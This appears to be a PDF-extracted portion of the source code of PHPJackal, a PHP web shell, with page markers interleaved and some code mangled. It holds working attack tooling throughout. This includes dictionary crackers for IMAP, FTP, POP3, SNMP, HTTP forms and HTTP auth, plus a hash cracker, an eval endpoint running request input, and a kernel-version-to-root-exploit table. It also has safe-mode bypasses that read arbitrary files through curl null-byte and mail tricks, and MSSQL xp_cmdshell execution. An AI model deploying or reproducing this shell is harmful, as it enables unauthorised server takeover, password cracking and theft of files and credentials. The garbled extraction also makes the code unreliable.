$lc$et$td1n$td2m$hcwd$td1n Note: Max allowed file size to upload on
thisserver is $min$et$et";}}function
imapchecK($host,$username,$password,$timeout){$sock=fsockopen($host,143,$n,$s,$timeout);$b=uniqid('NJ');$l=strlen($b);if(!$sock)return
-1;fread($sock,1024);fputs($sock,"$b LOGIN $username
$password\r\n");$res=fgets($sock,$l+4);
fclose($sock);if($res=="$b OK")return 1;else return 0;}function ftpchecK($host,$username,$password,$timeout){$ftp=ftp_connect($host,21,$timeout);if(!$ftp)return -1;$con=ftp_login($ftp,$username,$password);if($con)return 1;else return 0;}function pop3checK($server,$user,$pass,$timeout){$sock=fsockopen($server,110,$en,$es,$timeout);if(!$sock)return -1;fread($sock,1024);
fwrite($sock,"user $user\n");$r=fgets($sock);if($r{0}=='-')return 0;
5/13/2018 Php Jackal
22/39
fwrite($sock,"pass $pass\n");$r=fgets($sock);fclose($sock);if($r{0}=='+')return 1;return 0;}function formcrackeR(){
global $errorbox,$footer,$et,$hcwd;if(!empty($_REQUEST['start'])){if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;$url=$_REQUEST['target'];$uf=$_REQUEST['userf'];$pf=$_REQUEST['passf'];$sf=$_REQUEST['submitf'];$sv=$_REQUEST['submitv'];$method=$_REQUEST['method'];$fail=$_REQUEST['fail'];$dic=$_REQUEST['dictionary'];
$type=$_REQUEST['combo'];$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';if(!file_exists($dic))die("$errorbox
Can not open
dictionary.$et$footer");$dictionary=fopen($dic,'r');echo 'Cracking
started...
';while(!feof($dictionary)){if($type){$combo=trim(fgets($dictionary),"
\n\r");$user=substr($combo,0,strpos($combo,':'));$pass=substr($combo,strpos($combo,':')+1);}else{$pass=trim(fgets($dictionary),"
\n\r");}
$url.="?$uf=$user&$pf=$pass&$sf=$sv";$res=check_urL($url,$method,$fail,12);if(!$res){echo
"U: $user P: $pass
";if($log)file_add_contentS($file,"U: $user P:
$pass\r\n");if(!$type)break;}}fclose($dictionary);echo 'Done!
';}else echo "HTTP Form cracker:Dictionary:Dictionary type:Simple
(P)Combo (U:P)Username:$hcwdAction Page:Method:POSTGETUsername
field name:Password field name:
5/13/2018 Php Jackal
23/39
4' bgcolor='#808080'>Submit name:Submit value:Fail string:Log $et";}function hashcrackeR(){global $errorbox,$t,$et,$hcwd;if(!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;$dictionary=fopen($_REQUEST['dictionary'],'r');
if($dictionary){$hash=strtoupper($_REQUEST['hash']);echo
'Cracking '.htmlspecialchars($hash).'...
';$type=($_REQUEST['type']=='MD5')?'md5':'sha1';while(!feof($dictionary)){$word=trim(fgets($dictionary),"
\n\r");if($hash==strtoupper(($type($word)))){echo "The answer is
$word
";if($log)file_add_contentS($file,"$x\r\n");break;}}echo
'Done!';fclose($dictionary);}else{
echo "$errorbox Can not open dictionary.$et";}}echo "${t}Hash cracker:Dictionary:Hash:Type:MD5SHA1L
og $hcwd $et";}function pr0xy(){global $errorbox,$et,$footer,$hcwd;echo "Navigator: $hcwd$et";if(!empty($_REQUEST['urL'])){
$u=parse_url($_REQUEST['urL']);$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$dir=dirname($file);
5/13/2018 Php Jackal
24/39
$con=getiT($_REQUEST['urL']);$s=array("href=mailto"=>"HrEf=mailto","HREF=mailto"=>"HrEf=mailto","href='mailto"=>"HrEf=\"mailto","HREF=\"mailto"=>"HrEf=\"mailto","href=\'mailto"=>"HrEf=\"mailto","HREF=\'mailto"=>"HrEf=\"mailto","href=\"http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"HREF=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=http"=>"HrEf=".hlinK("seC=px&urL=http"),"HREF=http"=>"HrEf=".hlinK("seC=px&urL=http"),"href=\""=>"HrEf=\"".hlinK("seC=px&urL=h
ttp://$host/$dir/"),"HREF=\""=>"HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),"href=\""=>"HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),'HREF="'=>'HrEf="'.hlinK("seC=px&urL=http://$host/$dir/"),"href="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),"HREF="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"));$con=replace_stR($s,$con);echo $con;}}function sqlclienT(){global $t,$errorbox,$et,$hcwd;if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
$server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];$db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];$res=querY($type,$server,$user,$pass,$db,$query);if($res){$res=str_replace('-----','',$res);$res=str_replace('+++++','',$res);$r=explode('[+][+][+]',$res);$r[1]=str_replace('[-][-][-]',"",$r[1]);echo
"".$r[1].''.$r[0]."$et
";}else{
echo "$errorbox Failed!$et
";}}if(empty($_REQUEST['typE']))$_REQUEST['typE']='';echo "${t}SQL
cilent:MySQLMSSQLOraclePostgreSQLServer:Username:Password:Database:Query:";if
(!empty($_REQUEST['querY'])) echo
htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES';
echo "$hcwd
5/13/2018 Php Jackal
25/39
class=buttons type=submit value='Submit Query'>$et";}function querY($type,$host,$user,$pass,$db='',$query){$res='';switch($type){case 'MySQL':if(!function_exists('mysql_connect'))return 0;
$link=mysql_connect($host,$user,$pass);if($link){if(!empty($db))mysql_select_db($db,$link);$result=mysql_query($query,$link);while($data=mysql_fetch_row($result))$res.=implode('-----',$data).'+++++';$res.='[+][+][+]';for($i=0;$i
5/13/2018 Php Jackal
26/39
return $res;}break;}return 0;}function phpevaL(){
global $t,$hcwd,$et;echo
'';if(!empty($_REQUEST['code'])){$s=array(''=>'');echo "";echo
htmlspecialchars(eval(replace_stR($s,$_REQUEST['code'])));echo
'
';}echo "${t}Evaler:Codes:";if(!empty($_REQUEST['code']))echo
htmlspecialchars($_REQUEST['code']);echo "$hcwd$et";}function
rootxpL(){$v=php_uname();$db=array('2.6.17'=>'prctl3,
raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh,raptor,
raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2,
h00lyshit','2.6.14'=>'raptor, raptor2,
h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh,
prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3,
krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24,
exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3,
h00lyshit','2.6.8'=>'h00lyshit, krad,
krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit,
krad, krad2','2.6.2'=>'h00lyshit, krad,
mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod,
ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24,
smpracer','2.4.27'=>'
elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace,uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx,kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace');foreach($db as $k=>$x)if(strstr($v,$k))return $x;return 0;}
function toolS(){global $t,$hcwd,$et,$cwd;if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['domaiN'])){$ser=fsockopen($_REQUEST['serveR'],43,$en,$es,5);fputs($ser,$_REQUEST['domaiN']."\r\n");echo '';while(!feof($ser))echo fgets($ser,1024);echo '';fclose($ser);}elseif(!empty($_REQUEST['urL'])){$h='';$u=parse_url($_REQUEST['urL']);
$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port'];$ser=fsockopen($host,$port,$en,$es,5);
5/13/2018 Php Jackal
27/39
if($ser){fputs($ser,"GET $file\r\nHost: $host\r\n\r\n");echo '';while($h!="\r\n"){$h=fgets($ser,1024);echo $h;}echo '';fclose($ser);}
}elseif(!empty($_REQUEST['ouT']) &&
isset($_REQUEST['pW'])&&
!empty($_REQUEST['uN'])){$htpasswd=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htpasswd';$htaccess=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htaccess';file_put_contents($htpasswd,$_REQUEST['uN'].':'.crypt(trim($_REQUEST['pW']),CRYPT_STD_DES));file_put_contents($htaccess,"AuthName
\"Secure\"\r\nAuthType Basic\r\nAuthUserFile $htpasswd\r\nRequire
valid-user\r\n");echo 'Done';}$s="";echo
"${t}WhoIs:${s}Server:domain:$hcwd$et
${t}.ht* generator:${s}Username:Password:Directory:$hcwd$et
${t}Grab header:${s}URL:$hcwd$et
";}function hexvieW(){
if(!empty($_REQUEST['filE'])){$f=$_REQUEST['filE'];echo "OffsetHexASCII";$file=fopen($f,'r');$i=-1;while(!feof($file)){$ln='';$i++;echo "";echo str_repeat('0',(8-strlen($i*16))).$i*16;echo '';echo "
5/13/2018 Php Jackal
28/39
echo "'>";for($j=0;$j
5/13/2018 Php Jackal
29/39
echo "$pr$i:(mb_send_mail$po";if(file_exists('/tmp/mb_send_mail'))unlink('/tmp/mb_send_mail');mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail');readfile('/tmp/mb_send_mail');$i++;}if(function_exists('curl_init')){
echo "$pr$i:(curl_init [A]$po";$fh=curl_init('file://'.$file.'');$tmp=curl_exec($fh);echo $tmp;$i++;echo "$pr$i:(curl_init [B]$po";$i++;if(strstr($file,DIRECTORY_SEPARATOR))$ch=curl_init('file:///'.$file."\x00/../../../../../../../../../../../../".__FILE__);else $ch=curl_init('file://'.$file."\x00".__FILE__);var_dump(curl_exec($ch));}
if(is_writable('.')){echo "$pr$i:(php.ini$po";file_put_contents('php.ini','safe_mode = Off');readfile($file);unlink('php.ini');$i++;}if(extension_loaded('perl')){echo "$pr$i:(perl$po";echo perlshelL("type \"$file\"");$i++;}if(is_object($ws=new COM('WScript.Shell'))){
echo "$pr$i:(COM$po";echo comshelL("type \"$file\"",$ws);$i++;}if(extension_loaded('ffi') && $windows){echo "$pr$i:(FFI$po";echo ffishelL("type \"$file\"");$i++;}if(checkfunctioN('win_shell_execute')){echo "$pr$i:(win32std$po";echo winshelL("type \"$file\"");
$i++;}if(checkfunctioN('win32_create_service')){echo "$pr$i:(win32service$po";echo srvshelL("type \"$file\"");$i++;}if(function_exists('imap_open')){echo "$pr$i:(imap [A]$po";$str=imap_open('/etc/passwd','','');$list=imap_list($str,$file,'*');for($i=0;$i
5/13/2018 Php Jackal
30/39
$tmp=imap_body($str,1);echo $tmp;imap_close($str);$i++;}if($file=='/etc/passwd'){echo "$pr$i:(posix$po";
for($uid=0;$uid1)$list=imap_list($str,trim($s[0]),trim($s[1]));else $list=imap_list($str,trim($str[0]),'*');for($i=0;$i
5/13/2018 Php Jackal
31/39
echo '';}elseif(!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])){$res='';$tb=uniqid('NJ');$db=mssql_connect($_REQUEST['serveR'],$_REQUEST['useR'],$_REQUEST['pasS']);
mssql_select_db($_REQUEST['dB'],$db);mssql_query("create table
$tb ( string VARCHAR (500) NULL)",$db);mssql_query("insert into $tb
EXEC master.dbo.xp_cmdshell
'".$_REQUEST['coM']."'",$db);$re=mssql_query("select * from
$tb",$db);while(($row=mssql_fetch_row($re))){$res.=
$row[0]."\r\n";}mssql_query("drop table
$tb",$db);mssql_close($db);echo "$res
";
}$f=(!empty($_REQUEST['file']))?htmlspecialchars($_REQUEST['file']):'/etc/passwd';$u=(!empty($_REQUEST['user']))?htmlspecialchars($_REQUEST['user']):'root';$p=(!empty($_REQUEST['pass']))?htmlspecialchars($_REQUEST['pass']):'123456';$d=(!empty($_REQUEST['db']))?htmlspecialchars($_REQUEST['db']):'test';echo
"${t}Use PHP Bugs:File:$hcwd$et
${t}Use MySQL:File:Username:Password:Database:$hcwd$et
${t}MSSQL
Exec:Server:Username:Password:Command:Database:$hcwd$et";}function
crackeR(){
global $errorbox,$t,$et,$crack,$cwd;$check=(!empty($_REQUEST['dictionary']) && !empty($_REQUEST['target']))?1:0;if(!empty($_REQUEST['cracK']) && !$check){
5/13/2018 Php Jackal
32/39
$c=htmlspecialchars($_REQUEST['cracK']);echo "$t$c cracker:$crack";}elseif(!empty($_REQUEST['cracK']) && $check){$pro=strtolower($_REQUEST['cracK']).'checK';$target=$_REQUEST['target'];$type=$_REQUEST['combo'];
$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';$dictionary=fopen($_REQUEST['dictionary'],'r');if(isset($_REQUEST['loG'])&&
!empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else
$log=0;if($dictionary){echo 'Cracking
'.htmlspecialchars($target).'...
';while(!feof($dictionary)){if($type){$combo=trim(fgets($dictionary),"
\n\r");$user=substr($combo,0,strpos($combo,':'));$pass=substr($combo,strpos($combo,':')+1);}else{
$pass=trim(fgets($dictionary),"
\n\r");}$ret=$pro($target,$user,$pass,5);if($ret==-1){echo
"$errorbox Can not connect to
server.$et";break;}else{if($ret){$x="U: $user P: $pass";echo
"$x
";if($log)file_add_contentS($file,"$x\r\n");if(!$type)break;}}}echo
'
Done';fclose($dictionary);}else{echo "$errorbox Can not open
dictionary.$et";}
}else{echo "[Hash] - [SMTP] - [POP3] - [IMAP]- [FTP] - [SNMP] -
[MySQL] - [MSSQL] - [HTTP Form] - [HTTP Auth(basic)] - [Dictionary
maker]$et";}}function snmpcrackeR(){global
$t,$et,$errorbox,$hcwd;if(!empty($_REQUEST['target']) &&
!empty($_REQUEST['dictionary'])){$target=$_REQUEST['target'];if(isset($_REQUEST['loG'])&&
!empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else
$log=0;$dictionary=fopen($_REQUEST['dictionary'],'r');if($dictionary){echo
'Cracking '.htmlspecialchars($target).'...
';while(!feof($dictionary)){
$com=trim(fgets($dictionary),"
\n\r");$res=snmpchecK($target,$com,2);if($res){echo "$com
";if($log)file_add_contentS($file,"$com\r\n");}
5/13/2018 Php Jackal
33/39
}echo '
Done';fclose($dictionary);}else{echo "$errorbox Can not open
dictionary.$et";}
}else echo "${t}SNMP cracker:$hcwdDictionary:Server:Log $et";}function dicmakeR(){
global $errorbox,$windows,$footer,$t,$et,$hcwd;$combo=(empty($_REQUEST['combo']))?0:1;if(!empty($_REQUEST['range'])&& !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){$min=$_REQUEST['min'];$max=$_REQUEST['max'];if($max
5/13/2018 Php Jackal
34/39
$user=trim(fgets($in)," \n\r");if(!strstr($user,':'))continue;$user=substr($user,0,(strpos($user,':')));if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n");}fclose($input);fclose($output);echo 'Done';
}}}else{$output=fopen($_REQUEST['output'],'w');if($output){while(!feof($input)){$user=trim(fgets($input)," \n\r");if(!strstr($user,':'))continue;$user=substr($user,0,(strpos($user,':')));if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n");}
fclose($input);fclose($output);echo 'Done';}else echo
$errorbox.' Unable to write data to
'.htmlspecialchars($_REQUEST['input'])."$et
";}}elseif(!empty($_REQUEST['url']) &&
!empty($_REQUEST['output'])){$res=downloadiT($_REQUEST['url'],$_REQUEST['output']);if($combo
&&
$res){$file=file($_REQUEST['output']);$output=fopen($_REQUEST['output'],'w');foreach($file
as $v)fwrite($output,"$v:$v\n");fclose($output);
}echo 'Done';}else{$temp=whereistmP().DIRECTORY_SEPARATOR;echo
"${t}Wordlist generator:Range:a-zA-Z0-9Min lenght:12345678910Max
lenght:23456789101112131415Output:Combo style output$hcwd$et
${t}Grab dictionary:Grab from:Output:
5/13/2018 Php Jackal
35/39
lue='$temp.dic' name=output size=35>Combo style
output$hcwd$et
${t}Download dictionary:URL:Output:Combo style
output$hcwd$et";}}function ftpclienT(){global
$t,$cwd,$hcwd,$errorbox,$et;$td="";if(!empty($_REQUEST['hosT'])
&& !empty($_REQUEST['useR']) &&
isset($_REQUEST['pa
sS']) && function_exists('ftp_connect')){$user=$_REQUEST['useR'];$pass=$_REQUEST['pasS'];$host=$_REQUEST['hosT'];$con=ftp_connect($_REQUEST['hosT'],21,10);if($con){$ftp=ftp_login($con,$user,$pass);if($ftp){if(!empty($_REQUEST['PWD']))ftp_chdir($con,$_REQUEST['PWD']);if(!empty($_REQUEST['filE'])){$file=$_REQUEST['filE'];$mode=(isset($_REQUEST['modE']))?FTP_BINARY:FTP_ASCII;if(isset($_REQUEST['geT']))ftp_get($con,$file,$file,$mode);elseif(isset($_REQUEST['puT']))ftp_put($con,$file,$file,$mode);elseif(isset($_REQUEST['rM'])){
ftp_rmdir($con,$file);ftp_delete($con,$file);}elseif(isset($_REQUEST['mD']))ftp_mkdir($con,$file);}$pwd=ftp_pwd($con);$dir=ftp_nlist($con,'');$d=opendir($cwd);echo
"${td}Server:${td}Client:$td$td$td";foreach($dir as $n)echo
"$n
";echo "$td";while($cdir=readdir($d))if($cdir!='.' &&
$cdir!='..')echo "$cdir
"; echo "${td}Name:Binary$td$et";}else echo "$errorbox Wrong
username or password$et";}else echo "$errorbox Can not connect to
server!$et";}
else{echo "${t}FTP cilent:Server:
5/13/2018 Php Jackal
36/39
'#666666'>Username:Password:$hcwd$et";
}}function calC(){global
$t,$et,$hcwd;$fu=array('-','md5','sha1','crc32','hex','ip2long','decbin','dechex','hexdec','bindec','long2ip','base64_encode','base64_decode','urldecode','urlencode','des','strrev');if(!empty($_REQUEST['input'])
&&
(in_array($_REQUEST['to'],$fu))){$to=$_REQUEST['to'];echo
"${t}Output:
";if($to=='hex')for($i=0;$i
5/13/2018 Php Jackal
37/39
$pass=trim(fgets($dictionary)," \n\r");}$so=fsockopen($host,80,$en,$es,5);if(!$so){echo "$errorbox Can not connect to host$et";break;}else{$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$
pass");if($method=='POST')$packet.='Content-Type: application/x-www-form-urlencoded\r\nContent-Length: '.strlen($data);$packet.="\r\n\r\n";$packet.=$data;fputs($so,$packet);$res=substr(fgets($so),9,2);fclose($so);if($res=='20'){echo "U: $user P: $pass";if($log)file_add_contentS($file,"U:$user P: $pass\r\n");}}}
echo 'Done!';}else echo "${t}HTTP Auth cracker:POSTGETDictionary:Dictionary type:Simple (P)Combo (U:P)Username:Server:Log $hcwd $et";}function openiT($name){$ext=strtolower(substr($name,strrpos($name,'.')+1));$src=array('php','php3','php4','phps','phtml','phtm','inc');if(in_array($ext,$src))highlight_file($name);else echo ''.htmlspecialchars(file_get_contents($name)).'';}function opensesS($name){$sess=file_get_contents($name);$var=explode(';',$sess);echo "Name\tType\tValue\r\n";foreach($var as $v){$t=explode('',$v);$c=explode(':',$t[1]);$y='';if($c[0]=='i')$y='Integer';elseif($c[0]=='s')$y='String';elseif($c[0]=='b')$y='Boolean';elseif($c[0]=='f')$y='Float';elseif($c[0]=='a')$y='Array';elseif($c[0]=='o')$y='Object';elseif($c[0]=='n')$y='Null';
echo $t[0]."\t$y\t".$c[1]."\r\n";}echo '';
5/13/2018 Php Jackal
38/39
}function logouT(){setcookie('passw','',time()-10000);header('Location: '.hlinK());}?>
body{scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table {font-size: 15px;} .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}function HS(box){
if(document.getElementById(box).style.display!="none"){document.getElementById(box).style.display="none";document.getElementById('lk').innerHTML="+";}else{document.getElementById(box).style.display="";document.getElementById('lk').innerHTML="-";}}function chmoD($file){$ch=prompt("Changing file mode["+$file+"]: ex. 777","");if($ch != null)location.href=""+$file+"&modE="+$ch;
}PHPJackal [][Back] -
5/13/2018 Php Jackal
39/39
case 'fm':filemanageR();break;case 'sc':scanneR();break;case 'phpinfo':phpinfo();break;case 'edit':if(!empty($_REQUEST['open']))editoR($_REQUEST['filE']);if(!empty($_REQUEST['Save'])){$filehandle=fopen($_REQUEST['file'],'w');fwrite($filehandle,$_REQUEST['edited']);
fclose($filehandle);}if(!empty($_REQUEST['filE']))editoR($_REQUEST['filE']);else editoR('');break;case 'openit':openiT($_REQUEST['namE']);break;case 'cr':crackeR();break;case 'dic':dicmakeR();break;case 'tools':toolS();break;case 'hex':hexvieW();break;case 'img':showimagE($_REQUEST['filE']);break;case 'inc':if(file_exists($_REQUEST['filE']))include($_REQUEST['filE']);break;case 'hc':hashcrackeR();break;case 'fcr':formcrackeR();break;
case 'auth':authcrackeR();break;case 'ftpc':ftpclienT();break;case 'eval':phpevaL();break;case 'snmp':snmpcrackeR();break;case 'px':pr0xy();break;case 'webshell':webshelL();break;case 'mailer':maileR();break;case 'br':brshelL();break;case 'asm':safemodE();break;case 'sqlcl':sqlclienT();break;case 'calc':calC();break;case 'sysinfo':sysinfO();break;case 'checksum':checksuM($_REQUEST['filE']);break;
case 'logout':logouT();break;default: echo $intro;}}else echo $intro;echo $footer;?>